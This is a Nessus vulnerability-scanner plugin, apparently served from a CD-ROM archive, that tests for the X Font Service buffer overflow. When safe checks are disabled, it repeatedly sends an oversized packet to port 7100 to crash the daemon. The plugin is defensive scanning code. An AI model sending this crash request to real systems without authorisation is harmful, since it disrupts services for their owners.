home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / xfs_overflow.nasl < prev    next >
Text File  |  2005-01-14  |  3KB  |  131 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6. #update by rd: 
  7. #
  8. # It turns out the initial revision of this script would *not* crash
  9. # all versions of the font service.
  10. #
  11.  
  12. if(description)
  13. {
  14.  script_id(11188);
  15.  script_bugtraq_id(6241);
  16.  script_version ("$Revision: 1.8 $");
  17.  script_cve_id("CAN-2002-1317");
  18.  
  19.  name["english"] = "X Font Service Buffer Overflow";
  20.  
  21.  script_name(english:name["english"]);
  22.  
  23.  desc["english"] = "
  24. The remote X Font Service (xfs) is vulnerable to a buffer
  25. overflow.
  26.  
  27. An attacker may use this flaw to gain root or nobody shell
  28. access on the remote host.
  29.  
  30. Solution : See CERT Advisory CA-2002-34
  31. Risk factor : High";
  32.  
  33.  
  34.  
  35.  script_description(english:desc["english"]);
  36.  
  37.  summary["english"] = "Crashes the remote XFS daemon";
  38.  
  39.  script_summary(english:summary["english"]);
  40.  
  41.  script_category(ACT_MIXED_ATTACK);
  42.  
  43.  
  44.  script_copyright(english:"This script is Copyright (C) 2002 Renaud Deraison",
  45.         francais:"Ce script est Copyright (C) 2002 Renaud Deraison");
  46.  family["english"] = "Gain root remotely"; 
  47.  
  48.  script_family(english:family["english"]);
  49.  script_require_ports(7100);
  50.  if ( defined_func("bn_random") )
  51.      script_dependencie("solaris26_108129.nasl", "solaris26_x86_108130.nasl", "solaris7_108117.nasl", "solaris7_x86_108118.nasl");
  52.  exit(0);
  53. }
  54.  
  55.  
  56. include("misc_func.inc");
  57. include("solaris.inc");
  58. include("global_settings.inc");
  59.  
  60. if ( get_kb_item("BID-6241") ) exit(0);
  61. version = get_kb_item("Host/Solaris/Version");
  62. if ( version && "5.10" >< version ) exit(0);
  63.  
  64. if ( version && ereg(pattern:"5\.[89]", string:version) ) 
  65. {
  66.  if ( solaris_check_patch(release:"5.8_x86", arch:"intel", patch:"109863-03") >= 0 ||
  67.       solaris_check_patch(release:"5.8", arch:"sparc", patch:"109862-03") >= 0 ||
  68.       solaris_check_patch(release:"5.9", arch:"sparc", patch:"113923-02") >= 0 ||
  69.       solaris_check_patch(release:"5.9_x86", arch:"intel", patch:"113924-02") >= 0)
  70.     exit(0);
  71.     
  72. }
  73.  
  74. kb = known_service(port:7100);
  75. if(kb && kb != "xfs")exit(0);
  76.  
  77.  
  78. port = 7100;
  79.  
  80. if(safe_checks())
  81. {
  82.  if (report_paranoia < 1) exit(0);    # No FP
  83.  if(get_port_state(port))
  84.  {
  85.   soc = open_sock_tcp(port);
  86.   if(soc)
  87.   { 
  88.    close(soc);
  89.    report = "
  90. The remote X Font Service (xfs) might be vulnerable to a buffer
  91. overflow.
  92.  
  93. An attacker may use this flaw to gain root on this host
  94. remotely.
  95.  
  96. *** Note that Nessus did not actually check for the flaw
  97. *** as details about this vulnerability are still unknown
  98.  
  99. Solution : See CERT Advisory CA-2002-34
  100. Risk factor : High";
  101.    security_hole(port:port, data:report);
  102.   }
  103.  }
  104.  exit(0);
  105. }
  106.  
  107.  
  108. # Safe checks are disabled - let's be nasty.
  109.  
  110. req = string("B", raw_string(0x00, 0x02), crap(1024));
  111.  
  112. if(get_port_state(port))
  113. {
  114.  soc = open_sock_tcp(port);
  115.  if(!soc)exit(0);
  116.  send(socket:soc, data:req);
  117.  close(soc);
  118.  
  119.  # We might need to re-try the attack up to ten times
  120.  
  121.   for(i = 0 ; i < 10 ; i = i + 1)
  122.   {
  123.   soc = open_sock_tcp(port);
  124.   if(soc)
  125.   { 
  126.   send(socket:soc, data:req);
  127.   close(soc);
  128.   } else { security_hole(port); exit(0); }
  129.  }
  130. }
  131.